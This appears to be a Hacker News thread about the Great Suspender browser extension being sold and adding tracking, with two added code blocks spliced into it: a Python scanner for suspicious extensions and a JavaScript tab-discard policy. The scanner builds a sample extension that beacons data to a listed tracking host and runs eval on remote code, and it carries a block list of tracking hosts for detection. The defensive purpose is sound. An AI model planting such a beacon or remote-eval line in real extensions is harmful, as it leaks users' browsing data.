| - Ratings Preview for YouTube, cdn.webtraanalytica.com
|
| Copied from
| https://github.com/greatsuspender/thegreatsuspender/issues/1...
| sn_master wrote:
| I wonder how many of those tracking websites or even the
| extensions themselves are owned by the same entity. That's a
| pretty common practice.
| ramraj07 wrote:
| My general policy is to never install any extension that has
| full browser access. Except if it's from the FAANG companies
| themselves.
| ant6n wrote:
| I wonder whether paying for extensions could be a way to build
| more trust.
| rplnt wrote:
| Is there an extension that can track my extensions?
| jhloa2 wrote:
| I was just thinking about something similar. It would be nice
| if at a minimum, we could put together a list of compromised
| extensions. I feel like I've seen quite a few of these
| reports recently
| pault wrote:
| It should be possible to look at the source code of known
| compromised extensions and put together a list of
| heuristics that could automate part of the process.
| Minifiers make it more difficult though.
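A heuristic scanner along the lines pault suggests, using the analytics hosts from kburman's list further up as its watch list. This is an added example, not code from the thread or from any of the extensions named; the unpacked extension it scans is constructed inline, and the minified-file check is there because, as noted, a clean scan of minified code proves little.

```python
import json
import re
import tempfile
from pathlib import Path

# Analytics hosts from kburman's list further up (copied from the thread, not invented).
FLAGGED_HOSTS = {
    "static.trckljanalytic.com",
    "static.trckpath.com",
    "api.trackized.com",
    "pc.findanalytic.com",
    "static.trackivation.com",
    "cdn.webtraanalytica.com",
}

# Match patterns behind the "Read and change all your data on all websites" warning.
ALL_SITES_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# A hostname at the start of a string literal, with or without a scheme.
HOST_RE = re.compile(
    r"""["'`](?:https?:)?(?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?=[/:?"'`]|$)""", re.I
)
# Constructs that let an extension run code it did not ship with.
DYNAMIC_CODE_RE = re.compile(r"\b(?:eval|new\s+Function|importScripts)\s*\(")
MINIFIED_LINE_LEN = 500  # a line this long is almost certainly minified output

def all_sites_access(manifest: dict) -> list:
    """Return the all-sites host patterns requested anywhere in the manifest."""
    requested = list(manifest.get("permissions", [])) + list(manifest.get("host_permissions", []))
    for script in manifest.get("content_scripts", []):
        requested += script.get("matches", [])
    return sorted(set(requested) & ALL_SITES_PATTERNS)

def scan_extension(root: Path) -> dict:
    """Apply the heuristics to the manifest and every .js file under an unpacked extension."""
    manifest = json.loads((root / "manifest.json").read_text(encoding="utf-8"))
    findings = {
        "name": manifest.get("name", "?"),
        "version": manifest.get("version", "?"),
        "all_sites_access": all_sites_access(manifest),
        "hosts": set(),          # every hostname found in string literals
        "flagged_hosts": set(),  # the subset that appears in FLAGGED_HOSTS
        "dynamic_code": [],      # (file, line, construct)
        "minified_files": [],    # files where a clean result proves little
    }
    for path in sorted(root.rglob("*.js")):
        text = path.read_text(encoding="utf-8", errors="replace")
        rel = str(path.relative_to(root))
        hosts = {h.lower() for h in HOST_RE.findall(text)}
        findings["hosts"] |= hosts
        findings["flagged_hosts"] |= hosts & FLAGGED_HOSTS
        for m in DYNAMIC_CODE_RE.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            findings["dynamic_code"].append((rel, line_no, m.group(0)))
        if any(len(line) > MINIFIED_LINE_LEN for line in text.splitlines()):
            findings["minified_files"].append(rel)
    return findings

def reasons(findings: dict) -> list:
    """Turn findings into the lines a reviewer would want to read."""
    out = []
    if findings["all_sites_access"]:
        out.append("requests access to all sites: " + ", ".join(findings["all_sites_access"]))
    for host in sorted(findings["flagged_hosts"]):
        out.append("contacts known tracking host " + host)
    for rel, line_no, construct in findings["dynamic_code"]:
        name = construct.rstrip("(").strip()
        out.append(f"{rel}:{line_no} uses {name}() (can run code that is not in the package)")
    for rel in findings["minified_files"]:
        out.append(f"{rel} is minified; a clean scan of it proves little, review by hand")
    return out

def build_sample_extension(root: Path) -> Path:
    """Write a constructed extension showing the pattern discussed in the thread:
    broad host access plus a beacon to one of the listed hosts. Not a real extension."""
    root.mkdir(parents=True, exist_ok=True)
    (root / "manifest.json").write_text(json.dumps({
        "name": "Constructed Tab Helper", "version": "7.1.9", "manifest_version": 2,
        "permissions": ["tabs", "storage", "<all_urls>"],
        "background": {"scripts": ["background.js"]},
    }), encoding="utf-8")
    (root / "background.js").write_text(
        "chrome.tabs.query({}, function (tabs) {\n"
        "  // constructed beacon to a host from the list above\n"
        "  fetch('https://static.trckpath.com/collect?n=' + tabs.length);\n"
        "});\n"
        "eval(remoteSource); // constructed stand-in for code fetched at runtime\n",
        encoding="utf-8",
    )
    return root

def demo() -> dict:
    """Build the constructed sample in a temp dir, scan it and return the findings."""
    return scan_extension(build_sample_extension(Path(tempfile.mkdtemp()) / "sample-ext"))

if __name__ == "__main__":
    for line in reasons(demo()):
        print("-", line)
```

Point `scan_extension` at a real unpacked extension directory (what the "Load unpacked" page in chrome://extensions expects) to review an update before keeping it.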
| Bayart wrote:
| You should be able to do some of that at the debug console
| level. But otherwise you're stuck tracking traffic at page
| level, at least as far as I know.
| zerd wrote:
| My wife installed an addon to be able to post Instagram posts
| from her laptop, and then suddenly clicking on google search
| results would sometimes, but not always hijack and redirect to
| bing, and then click on one of the ads. But it was clever
| because it only happened sometimes, and if she retried it it
| didn't happen, so whenever she would try to show me, it didn't
| happen. I just removed all her addons and the problem went away,
| so not sure which one it was.
| ufmace wrote:
| It's things like this that make me a lot more reluctant to
| install extensions that might be moderately convenient. Maybe
| they're okay now, but it's too much of a burden to keep track
| of what I have installed and which ones are known to be doing
| something nasty.
|
| Another loser in this whole game is the honest hobby extension
| developers, who have to deal with the power-users who might
| promote their extensions not wanting to bother for fear of not
| being able to keep a watch for potential malicious updates for
| all of them.
| AlphaWeaver wrote:
| Quick note about the workaround mentioned in this article - the
| suggestion to download the last known good version of the
| extension and sideload it is a good one, but it has some problems
| on Chrome.
|
| Chrome has features to dissuade users from installing extensions
| from outside the Chrome Web Store. If you load an unpacked
| extension, Chrome will issue an ominous warning (something like
| "this extension is untrusted, click here to uninstall") on every
| launch.
|
| One could argue this is for security, but this change was
| implemented around the same time that Google disabled the ability
| to self-host extensions that install into Chrome. Really this is
| a mechanism to shut out independent extension developers from any
| potential plausible third-party distribution method that doesn't
| rely on the Chrome Web Store (which Google controls and
| aggressively moderates.)
|
| Use Firefox.
| nousermane wrote:
| > Chrome will issue an ominous warning on every launch.
|
| That's google's shtick. They do the same if you unlock
| bootloader on your android phone. Black nag screen with scary
| text on every reboot.
| tyingq wrote:
| You could download it and publish it yourself. I have an
| extension I wrote myself, and while I occasionally see
| something about having to pay $5 in the extension management
| panel, it never forces me to do so. If they closed that hole,
| perhaps it's worth the $5 developer registration fee to some.
| AlphaWeaver wrote:
| When did you publish your extension? I'm an extension
| developer that makes a mildly popular extension used by a
| niche group (1-2k MAU) and the Chrome Web Store has tightened
| their policies over the years. It's possible that you're
| grandfathered in (and haven't hit any of the extra reporting
| requirements if you haven't updated your extension recently.)
|
| Extensions these days go through a rigorous review process,
| and Google regularly shuts down / imposes arbitrary
| restrictions against extensions due to changing policies.
|
| I understand the importance of strong moderation to protect
| users from malicious extensions, but I believe Google is
| using that as an excuse to further _lock down_ their store,
| increasing barriers to entry and making it harder for
| developers to build software to extend the most popular
| browser in the world without Google's blessing.
| tyingq wrote:
| I hadn't looked at it for a while, so I just did so.
|
| You're right...it won't let me update it now without a lot
| of justifications on their privacy tab. However, it is
| still published. The status is "Status: Published -
| unlisted", so I can't search for it, but I can go direct to
| the store url for it.
| AlphaWeaver wrote:
| Yeah, that matches up with what I've seen. They've at
| least been decent enough not to kick people off the
| store, but I don't think it's possible to just have them
| sign / publish something unlisted these days without a
| good deal of policy writing and justifications.
|
| Yet the large actors still publish malicious updates to
| extensions. ¯\_(ツ)_/¯
| tyingq wrote:
| They have this "private" feature now where you have to
| list the email addresses of people that are allowed to
| use the extension. I don't see why that couldn't be
| coupled with "no review required", so long as the list is
| relatively short. But, yeah, likely will never happen.
|
| Fortunately for me, I can re-do my extension to use the
| JS postMessage api which won't require hardly any
| permissions, and thus, not much to review.
| kobalsky wrote:
| > Chrome has features to dissuade users from installing
| extensions from outside the Chrome Web Store. If you load an
| unpacked extension, Chrome will issue an ominous warning
| (something like "this extension is untrusted, click here to
| uninstall") on every launch.
|
| I've been sideloading vimium and thegreatsuspender for years
| and I haven't seen this message ever. Not on Mac nor Linux.
| squaresmile wrote:
| I'm pretty sure if you enable Extension Developer Mode, you
| won't get that nagging message on launch.
| gcatalfamo wrote:
| There is another problem by sideloading the extension: you
| don't have cloud sync anymore, thus forcing you to sideload on
| every computer you have.
| [deleted]
| TedDoesntTalk wrote:
| > Use Firefox.
|
| Firefox has similar restrictions... you have to side load
| through Developer Options. If you're not a developer, you will
| be questioning why you're doing this and the less-technically
| inclined will simply never do it (like my wife).
|
| And it is not entirely nefarious as you suggest. It limits the
| damage that sideloaded extensions did roughly 2010 and earlier.
| The WebExtension API was another assault on extensions. These
| days, chrome and Firefox have essentially closed a huge attack
| vector even though extensions are a shadow of their former
| selves. I was a skeptic for a long time (why should power users
| pay for the faults of everyone else?) but no more. Kudos.
| kibwen wrote:
| _> you have to side load through Developer Options_
|
| I'm not sure what screen "Developer Options" is referring to,
| but you can load add-ons directly from your hard drive with
| no fuss from the Add-ons page (though you must be running the
| Nightly or Developer version of Firefox). Click the gear icon
| right above your list of installed add-ons (this is also the
| menu that lets you disable auto-updates).
| driverdan wrote:
| Installing extensions from a file is supported in the
| latest mainline FF (84.0.2), nightly or dev are not
| required. I currently have one installed. It just shows a
| confirmation dialog and then installs it.
| bovine3dom wrote:
| This is true but misleading: the extension you install
| from file has to be signed by Mozilla in exactly the same
| way that extensions on the store are signed.
| Arnavion wrote:
| You can remove the signature requirement on stable by
| setting `xpinstall.signatures.required` to `false` in
| your user.js / about:config
|
| (I wrote most of the extensions I installed for my own
| bespoke use, built locally as zip files and installed via
| "Install Add-on From File...", and I don't have a problem
| trusting myself.)
| bovine3dom wrote:
| I don't think this is true for the official Mozilla
| builds (except for Nightly, Beta and unbranded). It's
| possible that your distro has a custom build that allows
| the setting. Arch builds Firefox with `--allow-addon-sideload`
| which could be the culprit.
| Arnavion wrote:
| Ah indeed. My distro also builds with `--allow-addon-sideload`
| bovine3dom wrote:
| No promises that that's actually the right flag. I had a
| rummage around searchfox and it looks like that just
| enables extensions that have been placed in special
| directories (whether they must be signed or not is a
| different flag). There clearly is a setting somewhere
| though as the unbranded builds exist...
| jannes wrote:
| So you have to use an experimental version of Firefox.
| These nightly versions are less tested and can be a serious
| downgrade from any stable browser.
|
| That's hardly what "Use Firefox" implied.
| Semaphor wrote:
| The Developer Edition is not a nightly build, it's a beta
| build, so there has been some testing (Before I switched
| to stable, I only once had an issue). Your point stands
| though.
| bovine3dom wrote:
| You can use unbranded builds which are pretty much
| identical to the stable releases but let you use unsigned
| extensions.
|
| https://wiki.mozilla.org/Add-ons/Extension_Signing#Unbranded...
| kibwen wrote:
| I can see why you'd think that but in practice I assure
| you that your concern is unwarranted. I've been using
| Nightly Firefox exclusively for almost ten years and I
| honestly can't remember it ever crashing (excluding the
| times when I was manually futzing with experimental
| about:config flags back in the electrolysis days).
|
| As for the developer edition, it's literally the version
| that they expect web developers to use; it's not half-
| baked software by any means.
| kchr wrote:
| "Stable" doesn't necessarily mean that it is secure, from
| an end-user perspective.
| AlphaWeaver wrote:
| Chrome sideloads extensions through a similarly obscure menu
| - My main quarrel is the prompt where the _default option is
| to uninstall_ that appears on every launch. Firefox doesn't
| have that.
|
| Firefox also permits self-hosting extensions signed through
| their store, providing more freedom for extension developers.
| asddubs wrote:
| Yeah, I kind of hate it, but I can't really blame them for
| doing it, since before they did that, if you installed
| software from questionable sources like, say, Java from the
| Oracle website, it would bundle an Ask toolbar with it. And
| this was so common.
| Karunamon wrote:
| _Kudos?_
|
| Availability is part of security, and the most secure system
| is disconnected from the internet and powered off. Why are we
| cheering our software becoming _less_ useful in the name of
| safety? The switch to WebExtensions was a monstrous loss of
| functionality!
| [deleted]
| albertgoeswoof wrote:
| Or you can use https://www.one-tab.com/ or https://tab.bz for a
| similar-ish use case
| TheRealPomax wrote:
| Is there a reason this extension still exists, given that tabs
| get heavily deprioritized when not in focus, and have been for
| many, many versions now?
| spiffytech wrote:
| Chrome throttles tab CPU activities when backgrounded, but
| doesn't clear memory for the tab. For users like me who usually
| have 50-800 tabs open across all my browser windows, that
| _really_ adds up. I also appreciate (err... appreciated) The
| Great Suspender because I didn't want _all_ of those tabs
| active _every_ time I opened a browser, so I'd have scores of
| tabs that never even got loaded, but were ready to go the
| moment I wanted to return to them.
| shawnz wrote:
| Chrome does discard the memory of tabs that haven't been used
| recently and Great Suspender can be configured to make use of
| that functionality.
| dbbk wrote:
| They get throttled but still kept in memory. This drops them
| from memory.
| alyandon wrote:
| The MS Edge dev channel has a basic form of tab suspending built
| into it now. Based on my non-rigorous testing it seems to
| actually save more memory than TGS ever did so I just removed the
| extension entirely.
|
| It is really a shame that basic functionality like this isn't
| built into more browsers and we have to rely on extensions to
| fill the gaps just to keep memory usage under control for tab-a-
| holics like myself. :(
| davidfstr wrote:
| > It is really a shame that basic functionality like this isn't
| built into more browsers and we have to rely on extensions to
| fill the gaps just to keep memory usage under control for tab-
| a-holics like myself. :(
|
| The way I see it, extension developers get to come up with
| innovative new features first, and then the first-party vendors
| like Apple, Google, and Microsoft take note and eventually do
| just that: Integrate it into their own products.
|
| For example: The Great Suspender - Sleeping Tabs [experimental]
| (Microsoft/Edge); Flux - Night Shift (Apple/iOS); Growl - macOS
| Notifications (Apple/macOS); Swype - iOS Built-in Keyboard
| (Apple/iOS); etc
|
| Edit: Fix formatting.
| shawnz wrote:
| In fact tab suspending/discarding has been built into Chrome
| for some time now and Great Suspender does optionally make use
| of the built-in functionality.
|
| I still sometimes use extensions like Great Suspender to give
| more control over the process (e.g. to suspend more
| aggressively on RAM-constrained machines or where the user uses
| a lot of tabs).
|
| Since this news came out I have switched to "Auto Tab Discard".
| jannes wrote:
| Chromium-based browsers and Firefox have discarding built-in.
|
| chrome://discards/ has some advanced options (in Chromium-based
| browsers).
|
| Funnily enough, Google mentions The Great Suspender as
| inspiration for this feature in the August 2015 changelog:
| https://developers.google.com/web/updates/2015/09/tab-discar...
|
| > We actually had a great chat with the author of the Great
| Suspender extension while developing tab discarding and they're
| glad to see us natively tackling this problem in ways that are
| more efficient than an extension might be able to, such as
| losing the state of your user inactions.
| dbbk wrote:
| The functionality is built into Chrome, the native tab
| discarding just happens when it thinks memory pressure is too
| high. Extensions like this give you extra granularity to set it
| to happen after a timer.
| MacroChip wrote:
| Does this extension add functionality beyond Chrome's existing
| tab suspension?
| jeromeparadis wrote:
| There's a reason why I don't install any extension except a
| password manager.
| otterpro wrote:
| Wow, this is why just recently my MacBook Pro was registering
| high CPU usage even when all tabs were asleep using Great
| Suspender. For some reason, Chrome was registering high CPU
| usage, and I thought it was some Chrome bug.
| michaelcampbell wrote:
| You lost me. What's this "this" in "this is why", exactly?
| angryasian wrote:
| there really needs to be a better bookmarking solution.
| asadkn wrote:
| I have always used The Great Discarder instead [1]
|
| It's by the same dev too but it uses Chrome's Native Tab
| Discarding feature and I found it way more efficient (at the time
| I started using it a few years ago - haven't compared recently).
|
| [1] https://chrome.google.com/webstore/detail/the-great-discarde...
| monkpit wrote:
| I like the idea of using the discard mechanism, but if it's
| from the same developer, wouldn't it be at risk of having the
| same thing happen?
| asadkn wrote:
| True that's possible if it were to get popular. But since
| this wasn't the popular extension, it'd seem it wasn't sold
| off.
| shawnz wrote:
| Great Suspender eventually added functionality to use Chrome's
| native tab discarding as well and so they stopped updating
| Great Discarder.
| pjmlp wrote:
| I just don't use extensions, so no need to worry about such
| scenarios.
| StellarTabi wrote:
| The lack of user control, lock files, granularity of controls
| over browser extensions has gone too far.
| Aardwolf wrote:
| Doesn't chrome already suspend background tabs without plugin? At
| least I'm unable to properly have browser games running unless
| they're in a visible tab.
| rolfvandekrol wrote:
| Browser games, implemented in Javascript, usually depend on
| requestAnimationFrame, which is not executed in background
| tabs. See https://developer.mozilla.org/en-US/docs/Web/API/window/requ...
| for more info.
| mtoddsmith wrote:
| Seems there should be an extension which checks other extensions
| for nefarious activity or notifies you of the events that are
| mentioned in the article.
| dr-detroit wrote:
| You've heard of first world problems; this is Martian problems.
| Like, seriously, you can't manage Chrome tabs yourself?
| istorical wrote:
| Anyone able to compare Tiny Suspender and Auto Tab Discard?
| qwerty456127 wrote:
| By the way, is there an extension (I'm interested in both Firefox
| and Chrome) which would force all the new (background) tabs to be
| created in the suspended state (like if you had opened them in
| background and then restarted the browser) and only start loading
| after you actually open them?
| kchr wrote:
| Same here!
| gneray wrote:
| Ditto
| vmception wrote:
| Uninstalled and reported.
| orliesaurus wrote:
| Lifehack: export your suspended tabs as a flat file through the
| interface, uninstall the add on, then follow the downgrade as the
| blog suggests, at the end reimport your tabs from the flat file
| AQXt wrote:
| > Apparently recent versions of this extension have been taken
| over by a shady anonymous entity...
|
| That's something that worries me, whenever I install a software
| with trusted privileges.
|
| Software companies can sell their products -- and user base -- to
| other companies without notice.
|
| And it can be even worse in the free software world: think about
| all the updates that happen when you type
| `apt-get|yum|brew|npm|pip update`. What are the odds of a single
| dependency being taken over by a shady anonymous entity?
| [deleted]
| acdha wrote:
| This is why I stopped using extensions in any browser years ago
| unless it came from a trusted company I pay directly (i.e.
| 1Password). The broken economic model means that the developers
| always have pressure to cash in on a popular extension and Google
| has set things up to make abuse fast and easy with automatic
| silent updates and their usual skimping on human review. By the
| time the news about TGS came out most users already had the next
| release installed.
| jeffbee wrote:
| Indeed. There was never a basis for trusting The Great
| Suspender in the first place. "Read and change all your data"
| is a permission that should be reserved for code you wrote
| yourself.
| Centigonal wrote:
| More discussion on GitHub:
| https://github.com/greatsuspender/thegreatsuspender/issues/1...
|
| Quite similar to what happened to Nano Adblocker/Defender a few
| months ago.
| [deleted]
| gruez wrote:
| previous discussion:
| https://news.ycombinator.com/item?id=25622015
| [deleted]
| jancsika wrote:
| > Disable analytics tracking by opening the extension options for
| The Great Suspender and checking the box "Automatic deactivation
| of any kind of tracking".
|
| > Pray that the shady developer doesn't issue a malicious update
| to The Great Suspender later. (There's no sensible way to disable
| updates of an individual extension.)
|
| Does Debian ship packages for individual browser extensions?
|
| I mean, if they do, I'm sure it's not scalable and -- after
| spending time reading the debuild manual -- a giant, archaic pain
| in the ass.
|
| On the other hand, all these app delivery systems are so damned
| pernicious and require constant vigilance. We may have arrived at
| a moment in time where this is actually a difficult decision:
|
| * pay somebody a living wage to burrow down into Debian's WoT
| bureaucracy and add at least a selection of this functionality
| _without_ phoning home
|
| * continue playing the most tedious game of whack-a-mole with a
| whack-a-mole game that mines all our data in order to learn how
| best to beat all users at whack-a-mole
| [deleted]
| vaduz wrote:
| > Does Debian ship packages for individual browser extensions?
|
| They do, for a couple of the more notable ones (HTTPS Everywhere,
| uBlock Origin, Proxy Switcher, etc.) [0]
|
| > I mean, if they do, I'm sure it's not scalable and -- after
| spending time reading the debuild manual -- a giant, archaic pain
| in the ass.
|
| The biggest problem is to find a person to be a maintainer that
| is willing to keep up with the upstream development.
|
| [0]
| https://packages.debian.org/search?keywords=webext-&searchon...
| wintermutestwin wrote:
| At this point, I would gladly pay good money for a browser that
| prevented ads and tracking, provided most of the standard plugin
| functionality oob and vetted the rest. This whole mess is a
| massive time suck.
| [deleted]
| abecedarius wrote:
| I'm using Brave. Not sure it exactly matches what you want, but
| it's the closest I've found.
| skrowl wrote:
| Just sent him this email:
|
| Saw your article via HN.
|
| As an easier permanent fix, just uninstall The Great Suspender
| and install Auto Tab Discard (https://add0n.com/tab-
| discard.html). It does the same thing.
|
| It's available on:
|
| Firefox - Auto Tab Discard - Get this Extension for Firefox (en-
| US)(https://addons.mozilla.org/en-US/firefox/addon/auto-tab-
| disc...)
|
| Edge - Auto Tab Discard - Microsoft Edge Addons
| (https://microsoftedge.microsoft.com/addons/detail/auto-tab-d...)
|
| or even if you're still using Chrome - Auto Tab Discard - Chrome
| Web Store (https://chrome.google.com/webstore/detail/auto-tab-
| discard/j...)
| jschuur wrote:
| Discarding inactive tabs is not what I use The Great Suspender
| for. I use it to... suspend tabs. Auto Tab Discard doesn't seem
| to do that.
| shawnz wrote:
| Discarding the tab is superior to what Great Suspender used
| to do. Why would you want the old behaviour?
|
| Tab discarding is just a more efficient, native
| implementation of what Great Suspender aimed to do in the
| first place.
| Arnavion wrote:
| I don't use Chrome so I have no idea what either of these
| extensions did, but FF's implementation of tab discarding
| causes it to reload the page when I switch to the tab,
| which means I have to wait for the page to load before I
| can do whatever I wanted to do.
|
| I'd much rather have a way to just stop all JS on a
| "suspended" tab so that FF doesn't burn 20% CPU on tabs
| that aren't even visible. (Yes, I'm aware that JS timers,
| etc. operate at reduced frequency for unfocused tabs. I'm
| talking about stopping them entirely.) Discarding may be
| more efficient for the browser, but it's less efficient for
| me, the user, so I don't use it.
| shawnz wrote:
| Fair enough, although that is not what Great Suspender
| did. Great Suspender also causes the page to be reloaded
| on resumption, just like an early version of tab
| discarding.
|
| Tab discarding does have the slight advantage that it
| remembers what you typed in on the page and where you
| were scrolled (but nonetheless still causes a reload).
|
| What you are asking for regarding slowing the performance
| of background JS is something browsers already do:
| https://stackoverflow.com/questions/15871942/how-do-
| browsers...
|
| Making that behaviour more aggressive seems like it is
| liable to cause significant problems to the user
| experience with minimal benefits. E.g. background media
| playback would likely be broken, notifications, etc.
| Whereas you could simply use bookmarks instead of open
| tabs to get the same effect.
| Arnavion wrote:
| >What you are asking for regarding slowing the
| performance of background JS is something browsers
| already do
|
| As I wrote:
|
| >>(Yes I'm aware that JS timers, etc operate at reduced
| frequency for unfocused tabs. I'm talking about stopping
| them entirely.)
|
| >Making that behaviour more aggressive seems like it is
| liable to cause significant problems to the user
| experience with minimal benefits. E.g. background media
| playback would likely be broken, notifications, etc.
|
| I want none of those things from the "suspended" tabs.
|
| >Whereas you could simply use bookmarks instead of open
| tabs to get the same effect
|
| How? Do you mean I would load the bookmark into a new tab
| when I wanted to visit it? That not only has the same
| problem that I described for discarded tabs (have to wait
| for a page load), but is even worse because it loses all
| the context that discarded tabs do retain. Not to mention
| the annoyance of maintaining bookmarks for arbitrary tab
| groups that I just happen to have open.
| [deleted]
| [deleted]
| loceng wrote:
| Ah damn, I was about to try it to see if it actually
| discarded or suspended tabs.
| fudged71 wrote:
| What is the difference?
|
| From the website it sounds like the favicon is changed. So
| the tab doesn't go away; it's just on pause.
|
| Google: "a discarded tab doesn't go anywhere. We kill it but
| it's still visible on the Chrome tab strip. If you navigate
| back to a tab that's been discarded, it'll reload when
| clicked. Form content, scroll position and so on are saved
| and restored the same way they would be during
| forward/backward tab navigation."
|
| In the future this will be updated to also use a serializer
| for discarded tabs.
| kchr wrote:
| Discard doesn't mean "remove" in this context. It will unload
| the tab, but still keep the state for when you switch back to
| it. E.g. suspend it.
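Added example, not code from Auto Tab Discard, The Great Suspender or any browser vendor: an idle-tab policy for a WebExtension built on the native tabs.discard API that the Google quote above describes, rather than on a swapped-in "suspended" page. Assumptions: the manifest requests the `tabs` permission (needed to read tab URLs, and nothing wider than that); Tab objects carry `lastAccessed` (Firefox, and Chrome from version 121); `tabs.discard` is available (Chrome 54+, and `browser.tabs.discard` on Firefox). The sample tab strip is constructed.

```javascript
// Added example: an idle-tab discard policy on top of the native
// tabs.discard API. The policy is a pure function so it can be tested
// without a browser; the driver below only runs inside an extension.
const DEFAULT_IDLE_MS = 30 * 60 * 1000;   // 30 minutes, configurable

// Ids of background tabs that have been idle long enough. Active,
// already-discarded, audible and pinned tabs are kept, as are tabs the
// page marked autoDiscardable: false and tabs on allow-listed hosts.
function selectTabsToDiscard(tabs, now, idleMs = DEFAULT_IDLE_MS, opts = {}) {
  const { keepAudible = true, keepPinned = true, allowList = [] } = opts;
  return tabs
    .filter((t) => !t.active && !t.discarded && t.autoDiscardable !== false)
    .filter((t) => !(keepAudible && t.audible))
    .filter((t) => !(keepPinned && t.pinned))
    .filter((t) => !allowList.some((host) => hostMatches(t.url, host)))
    .filter((t) => typeof t.lastAccessed === 'number' && now - t.lastAccessed >= idleMs)
    .map((t) => t.id);
}

function hostMatches(url, host) {
  try { return new URL(url).hostname === host; } catch { return false; }
}

// Extension-side driver: query, decide, discard. Returns the ids discarded.
// `api` defaults to the global `chrome` object; pass `browser` on Firefox.
// Schedule it from an alarm in the background script (needs "alarms").
async function discardIdleTabs(options = {}, api = globalThis.chrome) {
  if (!api || !api.tabs) return [];       // not running inside an extension
  const tabs = await api.tabs.query({ active: false, discarded: false });
  const ids = selectTabsToDiscard(tabs, Date.now(), options.idleMs, options);
  for (const id of ids) await api.tabs.discard(id);
  return ids;
}

// Constructed sample tab strip for exercising the policy offline.
function sampleTabs(now) {
  const old = now - 60 * 60 * 1000;   // last used an hour ago
  return [
    { id: 1, active: true,  discarded: false, url: 'https://example.org/', lastAccessed: old },
    { id: 2, active: false, discarded: false, audible: true, url: 'https://music.example.org/', lastAccessed: old },
    { id: 3, active: false, discarded: false, pinned: true, url: 'https://example.org/pinned', lastAccessed: old },
    { id: 4, active: false, discarded: false, url: 'https://mail.example.test/inbox', lastAccessed: old },
    { id: 5, active: false, discarded: false, url: 'https://news.ycombinator.com/', lastAccessed: old },
    { id: 6, active: false, discarded: false, url: 'https://example.org/recent', lastAccessed: now - 60 * 1000 },
    { id: 7, active: false, discarded: true,  url: 'https://example.org/done', lastAccessed: old },
    { id: 8, active: false, discarded: false, autoDiscardable: false, url: 'https://example.org/form', lastAccessed: old },
  ];
}
```

With the defaults, only tabs 4 and 5 qualify; an allow-list entry for `mail.example.test` drops tab 4. Because the browser performs the discard, form content and scroll position come back through the normal session-restore path described in the Google quote, and the extension never needs the "read and change all your data" host permission that a content-script suspender requires.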
| nguyenkien wrote:
| Edge (dev) has built-in sleeping tabs. It works quite well.
| michaelcampbell wrote:
| I wish they had one that would do that based on memory or CPU
| usage of a tab.
| spiffytech wrote:
| Auto Tab Discard has a setting, "Discard a background tab if
| its memory usage (totalJSHeapSize) exceeds (in MB)"
| michaelcampbell wrote:
| Greyed out for me in FF. =\
| tyingq wrote:
| I'm now curious how much money the original developer was paid to
| hand it over. I imagine he/she knew what the buyer's plan was.
| probably_wrong wrote:
| According to the homepage of a company that buys apps, and as a
| first approximation, that would be "anywhere between 8x - 36x
| monthly revenue for apps. In most cases this is well above the
| standard market value of 6-12x".
|
| Whether they are lowballing candidates with that offer, I can't
| say.
| iamspoilt wrote:
| Uninstalled. Period.
| [deleted]
| jakobpb wrote:
| Uh, just use Firefox. Problem solved for both functionality and
| security.
| dstick wrote:
| More detailed information can be found here:
| https://github.com/greatsuspender/thegreatsuspender/issues/1...
___________________________________________________________________
(page generated 2021-01-20 23:00 UTC)